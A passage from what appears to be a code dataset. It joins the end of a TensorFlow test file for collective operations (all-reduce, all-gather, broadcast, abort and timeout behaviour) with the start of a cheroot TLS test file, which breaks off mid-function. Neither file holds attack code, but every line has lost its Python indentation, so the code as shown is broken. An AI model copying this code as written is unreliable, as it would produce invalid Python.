dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key=100,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key=200,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testCollectiveInvalidKey(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with self.assertRaisesRegex(
errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
' got type 2 and data_type 1'):
with ops.device(dev0):
collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager',
max_subdivs_per_device=[-1, 0, 16]), device_combination))
class AllReduceWithSubdivisionsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication,
max_subdivs_per_device):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
if max_subdivs_per_device == -1:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
else:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication,
max_subdivs_per_device=max_subdivs_per_device)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
@combinations.generate(
combinations.combine(required_physical_gpus=2, mode='eager'))
class XlaTest(test.TestCase, parameterized.TestCase):
def testReduce(self):
device0 = '/device:GPU:0'
device1 = '/device:GPU:1'
group_size = 2
group_key = 100
instance_key = 100
results = []
def all_reduce(device):
@def_function.function(jit_compile=True)
def f():
return _collective_ops.all_reduce_v2([1.], group_size, group_key,
instance_key)
with ops.device(device):
results.append(f())
t0 = threading.Thread(target=all_reduce, args=(device0,))
t1 = threading.Thread(target=all_reduce, args=(device1,))
t0.start()
t1.start()
t0.join()
t1.join()
self.assertAllEqual(results, [[2.], [2.]])
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there's no active collective ops. There could be
# exceptions like EOF which we expect users to catch, aborting collective
# ops on all op errors intervenes with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there're active collective ops at the time of
# an op error. This is due to the inability to cancel collective ops, and op
# errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there're active collective ops at
# the time of an op error. We rely cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testCancelDuringParamResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
t1_cancellation_manager = cancellation.CancellationManager()
t2_cancellation_manager = cancellation.CancellationManager()
@def_function.function
def _collective_fn(x):
# Run an assertion to crash one of the two function executions running
# collectives. We explicitly cancel the other in response.
assert_op = check_ops.assert_equal(x, in_tensor)
with ops.control_dependencies([assert_op]):
return collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
collective_concrete = _collective_fn.get_concrete_function(in_tensor)
finish_mu = threading.Lock()
finishes = 0
def _placement_wrapper(device, x, my_cancellation, other_cancellation):
try:
with ops.device(device):
cancelable_collective = my_cancellation.get_cancelable_function(
collective_concrete)
return cancelable_collective(x)
except errors.InvalidArgumentError:
# `assert_equal` failed for this execution of the function. The other
# function would deadlock without cancellation.
other_cancellation.start_cancel()
except errors.CancelledError:
pass
nonlocal finishes
with finish_mu:
finishes += 1
t1 = threading.Thread(
target=_placement_wrapper,
args=(dev0, constant_op.constant([1.]), t1_cancellation_manager,
t2_cancellation_manager))
t2 = threading.Thread(
target=_placement_wrapper,
# Will cause the assertion to fail
args=(dev1, constant_op.constant([2.]), t2_cancellation_manager,
t1_cancellation_manager))
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(finishes, 2)
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
class InputPipelineTest(test.TestCase):
def setUp(self):
super().setUp()
_setup_context()
def testMap(self):
group_size = 2
group_key = 100
instance_key = 100
def create_dataset_and_fetch_one(t):
dataset = dataset_ops.Dataset.from_tensor_slices([t])
def reduce_fn(t):
return CollectiveOpsV2.all_reduce(
t,
group_size=group_size,
group_key=group_key,
instance_key=instance_key)
dataset = dataset.map(reduce_fn)
return next(iter(dataset))
@def_function.function
def f():
with ops.device('CPU:0'):
value0 = create_dataset_and_fetch_one([1.])
with ops.device('CPU:1'):
value1 = create_dataset_and_fetch_one([2.])
return value0, value1
self.assertAllEqual(self.evaluate(f()), [[3.], [3.]])
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
os.environ['NCCL_DEBUG'] = 'INFO'
v2_compat.enable_v2_behavior()
test.main()
|
test_ssl.py
|
"""Tests for TLS support."""
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8 :
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import functools
import json
import os
import ssl
import subprocess
import sys
import threading
import time
import OpenSSL.SSL
import pytest
import requests
import six
import trustme
from .._compat import bton, ntob, ntou
from .._compat import IS_ABOVE_OPENSSL10, IS_PYPY
from .._compat import IS_LINUX, IS_MACOS, IS_WINDOWS
from ..server import HTTPServer, get_ssl_adapter_class
from ..testing import (
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
EPHEMERAL_PORT,
# get_server_client,
_get_conn_data,
_probe_ipv6_sock,
)
from ..wsgi import Gateway_10
IS_GITHUB_ACTIONS_WORKFLOW = bool(os.getenv('GITHUB_WORKFLOW'))
IS_WIN2016 = (
IS_WINDOWS
# pylint: disable=unsupported-membership-test
and b'Microsoft Windows Server 2016 Datacenter' in subprocess.check_output(
('systeminfo', ),
)
)
IS_LIBRESSL_BACKEND = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_PYOPENSSL_SSL_VERSION_1_0 = (
OpenSSL.SSL.SSLeay_version(OpenSSL.SSL.SSLEAY_VERSION).
startswith(b'OpenSSL 1.0.')
)
PY27 = sys.version_info[:2] == (2, 7)
PY34 = sys.version_info[:2] == (3, 4)
PY3 = not six.PY2
_stdlib_to_openssl_verify = {
ssl.CERT_NONE: OpenSSL.SSL.VERIFY_NONE,
ssl.CERT_OPTIONAL: OpenSSL.SSL.VERIFY_PEER,
ssl.CERT_REQUIRED:
OpenSSL.SSL.VERIFY_PEER + OpenSSL.SSL.VERIFY_FAIL_IF_NO_PEER_CERT,
}
fails_under_py3 = pytest.mark.xfail(
not six.PY2,
reason='Fails under Python 3+',
)
fails_under_py3_in_pypy = pytest.mark.xfail(
not six.PY2 and IS_PYPY,
reason='Fails under PyPy3',
)
missing_ipv6 = pytest.mark.skipif(
not _probe_ipv6_sock('::1'),
reason=''
'IPv6 is disabled '
'(for example, under Travis CI '
'which runs under GCE supporting only IPv4)',
)
class HelloWorldGateway(Gateway_10):
"""Gateway responding with Hello World to root URI."""
def respond(self):
"""Respond with dummy content via HTTP."""
req = self.req
req_uri = bton(req.uri)
if req_uri == '/':
req.status = b'200 OK'
req.ensure_headers_sent()
req.write(b'Hello world!')
return
if req_uri == '/env':
req.status = b'200 OK'
req.ensure_headers_sent()
env = self.get_environ()
# drop files so that it can be json dumped
env.pop('wsgi.errors')
env.pop('wsgi.input')
print(env)
req.write(json.dumps(env).encode('utf-8'))
return
return super(HelloWorldGateway, self).respond()
def make_tls_http_server(bind_addr, ssl_adapter, request):
"""Create and start an HTTP server bound to ``bind_addr``."""
httpserver = HTTPServer(
bind_addr=bind_addr,
gateway=HelloWorldGateway,
)
# httpserver.gateway = HelloWorldGateway
httpserver.ssl_adapter = ssl_adapter
threading.Thread(target=httpserver.safe_start).start()
while not httpserver.ready:
time.sleep(0.1)
request.addfinalizer(httpserver.stop)
return httpserver
@pytest.fixture
def tls_http_server(request):
"""Provision a server creator as a fixture."""
return functools.partial(make_tls_http_server, request=request)
@pytest.fixture
def ca():
"""Provide a certificate authority via fixture."""
return trustme.CA()
@pytest.fixture
def tls_ca_certificate_pem_path(ca):
"""Provide a certificate authority certificate file via fixture."""
with ca.cert_pem.tempfile() as ca_cert_pem:
yield ca_cert_pem
@pytest.fixture
def tls_certificate(ca):
"""Provide a leaf certificate via fixture."""
interface, host, port = _get_conn_data(ANY_INTERFACE_IPV4)
return ca.issue_server_cert(ntou(interface), )
@pytest.fixture
def tls_certificate_chain_pem_path(tls_certificate):
"""Provide a certificate chain PEM file path via fixture."""
with tls_certificate.private_key_and_cert_chain_pem.tempfile() as cert_pem:
yield cert_pem
@pytest.fixture
def tls_certificate_private_key_pem_path(tls_certificate):
"""Provide a certificate private key PEM file path via fixture."""
with tls_certificate.private_key_pem.tempfile() as cert_key_pem:
yield cert_key_pem
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
def test_ssl_adapters(
tls_http_server, adapter_type,
tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
tls_ca_certificate_pem_path,
):
"""Test ability to connect to server via HTTPS using adapters."""
interface, _host, port = _get_conn_data(ANY_INTERFACE_IPV4)
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path, tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_certificate.configure_cert(tls_adapter.context)
tlshttpserver = tls_http_server((interface, port), tls_adapter)
# testclient = get_server_client(tlshttpserver)
# testclient.get('/')
interface, _host, port = _get_conn_data(
tlshttpserver.bind_addr,
)
resp = requests.get(
'https://{host!s}:{port!s}/'.format(host=interface, port=port),
verify=tls_ca_certificate_pem_path,
)
assert resp.status_code == 200
assert resp.text == 'Hello world!'
@pytest.mark.parametrize(
'adapter_type',
(
'builtin',
'pyopenssl',
),
)
@pytest.mark.parametrize(
('is_trusted_cert', 'tls_client_identity'),
(
(True, 'localhost'), (True, '127.0.0.1'),
(True, '*.localhost'), (True, 'not_localhost'),
(False, 'localhost'),
),
)
@pytest.mark.parametrize(
'tls_verify_mode',
(
ssl.CERT_NONE, # server shouldn't validate client cert
ssl.CERT_OPTIONAL, # same as CERT_REQUIRED in client mode, don't use
ssl.CERT_REQUIRED, # server should validate if client cert CA is OK
),
)
def test_tls_client_auth(
# FIXME: remove twisted logic, separate tests
mocker,
tls_http_server, adapter_type,
ca,
tls_certificate,
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
tls_ca_certificate_pem_path,
is_trusted_cert, tls_client_identity,
tls_verify_mode,
):
"""Verify that client TLS certificate auth works correctly."""
test_cert_rejection = (
tls_verify_mode != ssl.CERT_NONE
and not is_trusted_cert
)
interface, _host, port = _get_conn_data(ANY_INTERFACE_IPV4)
client_cert_root_ca = ca if is_trusted_cert else trustme.CA()
with mocker.mock_module.patch(
'idna.core.ulabel',
return_value=ntob(tls_client_identity),
):
client_cert = client_cert_root_ca.issue_server_cert(
# FIXME: change to issue_cert once new trustme is out
ntou(tls_client_identity),
)
del client_cert_root_ca
with client_cert.private_key_and_cert_chain_pem.tempfile() as cl_pem:
tls_adapter_cls = get_ssl_adapter_class(name=adapter_type)
tls_adapter = tls_adapter_cls(
tls_certificate_chain_pem_path,
tls_certificate_private_key_pem_path,
)
if adapter_type == 'pyopenssl':
tls_adapter.context = tls_adapter.get_context()
tls_adapter.context.set_verify(
_stdlib_to_openssl_verify[tls_verify_mode],
lambda conn, cert, errno, depth, preverify_ok: preverify_ok,
)
else:
tls_adapter.context.verify_mode = tls_verify_mode
ca.configure_trust(tls_adapter.context)
tls_certificate.configure_cert(tls_adapter.context)
tlshttpserver = tls_http_server((interface, port), tls_adapter)
interface, _host, port = _get_conn_data(tlshttpserver.bind_addr)
make_https_request = functools.partial(
requests.get,
'https://{host!s}:{port!s}/'.format(host=interface, port=port),
# Server TLS certificate verification:
verify=tls_ca_certificate_pem_path,
# Client TLS certificate verification:
cert=cl_pem,
)
if not test_cert_rejection:
resp = make_https_request()
is_req_successful = resp.status_code == 200
if (
not is_req_successful
and IS_PYOPENSSL_SSL_VERSION_1_0
and adapter_type == 'builtin'
and tls_verify_mode == ssl.CERT_REQUIRED
and tls_client_identity == 'localhost'
and is_trusted_cert
) or PY34:
pytest.xfail(
'OpenSSL 1.0 has problems with verifying client certs',
)
assert is_req_successful
assert resp.text == 'Hello world!'
return
# xfail some flaky tests
# https://github.com/cherrypy/cheroot/issues/237
issue_237 = (
IS_MACOS
and adapter_type == 'builtin'
and tls_verify_mode != ssl.CERT_NONE
)
if issue_237:
pytest.xfail('Test sometimes fails')
expected_ssl_errors = (
requests.exceptions.SSLError,
OpenSSL.SSL.Error,
) if PY34 else (
requests.exceptions.SSLError,
)
if IS_WINDOWS or IS_GITHUB_ACTIONS_WORKFLOW:
expected_ssl_errors += requests.exceptions.ConnectionError,
with pytest.raises(expected_ssl_errors) as ssl_err:
make_https_request()
if PY34 and isinstance(ssl_err, OpenSSL.SSL.Error):
pytest.xfail(
'OpenSSL behaves wierdly under Python 3.4 '
'because of an outdated urllib3',
)
try:
err_text = ssl_err.value.args[0].reason.args[0].args[0]
except AttributeError:
if PY34:
pytest.xfail('OpenSSL behaves wierdly under Python 3.4')
elif not six.PY2 and IS_WINDOWS or IS_GITHUB_ACTIONS_WORKFLOW:
err_text = str(ssl_err.value)
else:
raise
expected_substrings = (
'sslv3 alert bad certificate' if IS_LIBRESSL_BACKEND
else 'tlsv1 alert unknown ca',
)
if not six.PY2:
